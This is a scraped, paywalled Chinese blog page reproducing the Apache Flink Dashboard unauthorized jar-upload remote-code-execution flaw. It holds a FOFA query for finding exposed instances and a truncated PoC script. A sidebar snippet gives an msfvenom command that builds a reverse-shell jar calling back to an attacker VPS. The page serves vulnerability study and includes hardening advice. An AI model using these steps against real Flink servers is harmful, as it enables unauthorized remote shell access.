gitee 上传jar包_【Apache Flink漏洞复现】未授权访问&上传jar包getshell

最新推荐文章于 2024-07-12 16:20:49 发布
最新推荐文章于 2024-07-12 16:20:49 发布
阅读量575 收藏 1
点赞数
文章标签: gitee 上传jar包
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_29820757/article/details/113491130
版权
Apache Flink的Dashboard默认缺乏用户认证,允许攻击者未经许可通过控制台上传恶意jar包,可能导致远程执行系统命令,获取服务器权限。为防止这种情况,建议设置防火墙策略限制Dashboard的访问,启用白名单IP访问和Web代理的Digest认证,以增强安全性。详细认证设置参考相关链接。请注意,不得利用此信息进行非法测试,以免产生不良后果。
摘要由CSDN通过智能技术生成

7e807b68842fe7bb0d9e5ca55d8ab0d0.png

8805d82ac4da053289e9aa69c06534d6.png

漏洞介绍

Apache Flink Dashboard默认没有用户权限认证

攻击者可以通过未授权的Flink Dashboard控制台

直接上传木马jar包

可远程执行任意系统命令获取服务器权限

影响范围 Apache Flink <= 1.9.1 漏洞检测 正文 
fofa搜索:app="Apache Flink"

f6c2de2d662a759357d49697c0c5df96.png

默认端口为8081poc.py 
import sysimport jsoni
最低0.47元/天 解锁文章
航空英语徐老师
关注
开源项目发布jar包到maven仓库
renkai721的专栏
08-16 173
开源项目发布jar包到maven仓库,gitee开源项目如何发布jar包,如何把项目打包成jar让别人在pom中依赖,maven如何依赖自己的开源jar,配置JAVA_HOME环境变量,配置CLASSPATH环境变量
Apache Flink任意Jar包上传getshell
谢公子的博客
10-27 2400
Apache Flink Apache Flink是由Apache软件基金会开发的开源流处理框架,其核心是用Java和Scala编写的分布式流数据流引擎。Flink以数据并行和流水线方式执行任意流数据程序,Flink的流水线运行时系统可以执行批处理和流处理程序。此外,Flink的运行时本身也支持迭代算法的执行 msfvenom -p java/shell_reverse_tcp LHOST=VPS的ip地址 LPORT=34567 -f jar > test.jar 漏洞描述 近日,有安全研
Apache-Flink授权访问高危漏洞修复
最新发布
weixin_38255219的博客
07-12 1643
由于flink没有鉴权的设置,使用使用 htpasswd 工具+服务器系统防火墙设置,才能禁用默认对外访问的8081端口,使用用户名+密码实现安全验证登录flink web ui。
Apache Flink漏洞复现(授权访问&上传jar包getshell)
qq_43244584的博客
01-26 5036
Apache Flink漏洞复现(授权访问&amp;上传jar包getshell) 一、Flink简介 Flink核心是一个流式的数据流执行引擎,其针对数据流的分布式计算提供了数据分布、数据通信以及容错机制等功能。基于流执行引擎,Flink提供了诸多更高抽象层的API以便用户编写分布式任务。 二、漏洞介绍 ​ Apache Flink Dashboard默认没有用户权限认证 ​ 攻击者可以通过授权Flink Dashboard控制台 ​ 直接上传木马jar包 ​ 可远程执行任意系统命令获取服务器权限
漏洞修复】修复 Apache Flink Web Dashboard 授权访问致远程命令执行漏洞
RobinWang的博客
01-15 8202
漏洞修复】修复 Apache Flink Web Dashboard 授权访问致远程命令执行漏洞 介绍 攻击者通过Flink Web Dashboard上传含有恶意代码的jar包进行攻击,中招会使服务器占满CPU沦为挖矿机,非常猖獗 通过反编译得到的恶意代码: package com.example; import java.io.IOException; public class Mai...
2020-10-24Apache Flink授权访问-远程代码命令执行-复现
thelostworld
10-24 1099
​好久没更新了,今天趁1024更新一篇,最近工作中遇到这个漏洞,今天自己来做一下这个漏洞复现Apache Flink授权访问-远程代码命令执行-复现 一、漏洞简介 Apache Flink Dashboard默认没有用户权限认证。攻击者可以通过授权Flink Dashboard控制台,直接上传木马jar包,可远程执行任意系统命令获取服务器权限,风险极大。 二、影响版本 Apache Flink <= 1.9.1(最新版本) 三、漏洞复现 1、生成反弹jar包 msfv..
Penetration_Testing_POC-About 渗透测试有关的POC、EXP、脚本、提权、小工具等
weixin_46280935的博客
09-10 5606
Penetration_Testing_POC 搜集有关渗透测试中用到的POC、脚本、工具、文章等姿势分享,作为笔记吧,欢迎补充。 Penetration_Testing_POC 请善用搜索[Ctrl+F]查找 IOT Device&amp;Mobile Phone Web APP 提权辅助相关 PC tools-小工具集合 文章/书籍/教程相关 说明 请善用搜索[Ctrl+F]查找 IOT Device&amp;Mobile Phone 天翼创维awifi路由器存在多处授权访问
Hadoop生态圈 大数据文档
BigData_XiaoBai的博客
12-01 826
文档基于介绍基于Hadoop的大数据生态圈。介绍下图每一个组件的使用场景及使用方法,同时还对每一个组件有更深入的介绍。 ..
day06.Hadoop快速入门&云服务三种模式IaaS,PaaS和SaaS【大数据教程】
Java帮帮
05-13 2736
day06.Hadoop快速入门&amp;amp;云服务三种模式IaaS,PaaS和SaaS【大数据教程】1. HADOOP背景介绍1.1 什么是HADOOP1). HADOOP是apache旗下的一套开源软件平台2). HADOOP提供的功能:利用服务器集群,根据用户的自定义业务逻辑,对海量数据进行分布式处理3). HADOOP的核心组件有A. HDFS(分布式文件系统)B. YARN(运算资源调度系统...
Centos7下搭建大数据处理集群(Hadoop+Spark+Hbase+Hive+Zookeeper+Kafka+Flume)详细步骤
风尘子曰
12-12 2859
一.目录 二.集群规划 三.虚拟机准备及基础配置设置 四.Hadoop 4.1安装Hadoop 4.1.1上传解压安装包 1.创建软件安装包上传目录/opt/package,Hadoop安装目录/opt/hadoop [root@hp1 opt]# mkdir package [root@hp1 opt]# mkdir hadoop 2.将下载好的Hadoop安装包上传到/opt/package...
spark的使用
pengfeijiuwanli的博客
05-16 1710
Apache Spark 什么是Spark? Spark是Lightning-fast unified analytics engine- 快如闪电的统一的分析引擎(不参与数据持久化)。 快 (1)Spark基于内存的计算引擎,相比于MapReduce磁盘计算,速度自然快- 大众认知 (2)Spark使用先进的DAG(矢量计算)计算模型,将一个复杂的任务拆分成若干个stage(阶段), 这样复杂的任务Spark只需要一个job即可完成。(如果使用MapReduce计算模型可能需要串连若干个Job) (3)
Apache-flink 授权访问任意jar包上传反弹shell.MD
04-12
Apache-flink 授权访问任意jar包上传反弹shell
gitee托管公有jar包
u013008898的博客
05-10 628
1.创建项目 2.将项目打入本地maven仓库中 3.上传文件到gitee中 4.查询下载路径 5.在项目的pom中添加代理地址 url中的地址即为代理路径 pom文件中添加: <repositories> <repository> <id>maven-javachen</id> <url>https://gitee.com/javaschen/r.
Apache Flink 授权远程代码执行检查
weixin_42299610的博客
06-07 1959
Apache Flink 授权远程代码执行检查
提交本地jar到Maven中央仓库(Windows&码云gitee托管代码)的那些小事
weixin_34288121的博客
04-17 644
为什么80%的码农都做不了架构师?>>> ...
攻击授权访问Flink 集群
3569
08-19 755
Flink 是一个针对流数据和批数据的分布式处理引擎,与 Storm 一起广泛应用于分布式实时计算场景中,且在某些场景下 Flink 性能要优于 Storm。然而 Flink 默认提供的 Web UI 却不支持鉴权,这就引发了非常明显的授权问题。 Flink Web UI 在 macOS 上简单安装一个单节点 Flink,直接使用 Homebrew。 brew install apac...
【CVE】CVE-2020-17518 & CVE-2020-17519:Flink 任意文件上传 & 授权访问
边扯边淡
05-09 2665
起序:漏扫完看报告的时候发现的,复现学习一下。 一、靶场环境 使用的是 github 上的 vulhub 环境。因为 Flink 中的 CVE-2020-17518 和 CVE-2020-17519 在 Flink/1.11.2 版本都存在。 vulhub:https://github.com/vulhub/vulhub 1、漏洞描述:任意文件上传 &amp; 授权访问 CVE 编号 名称 危害 CVE-2020-17518 任意文件上传 应用系统在文件上传功能处对用户上传.
Apache Flink 授权访问+远程代码执行
Adminxe的博客
11-12 1110
0x00 前言 @Adminxe 今天胖胖表哥突然扔来一个复现,那俺得瞧瞧,正好写个博客划划水,然后就引发了下面一些列的操作以及你想看到的,以及和你不想看到的文字。之前就有大佬复现过,毕竟水文和复现学习,那就来一波吧!最可恶的是,今天的MC兄没有请客喝啵啵奶茶,必须点名批评一下! 从现在fofa的搜索量来看,基本也就是国内Apache Flink 存在1500左右的站点。 有安全研究员公开了一个Apache Flink的任意Jar包上传导致远程代码执行的漏洞,影响范围: <= 1.9.1(最..
Apache Flink授权访问-远程代码命令执行-复现
thelostworld
10-24 704
​好久没更新了,今天趁1024更新一篇,最近工作中遇到这个漏洞,今天自己来做一下这个漏洞复现Apache Flink授权访问-远程代码命令执行-复现一、漏洞简介Apache Flink Dashboard默认没有用户权限认证。攻击者可以通过授权Flink Dashboard控制台,直接上传木马jar包,可远程执行任意系统命令获取服务器权限,风险极大。二、影响版本Apache Flink &...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值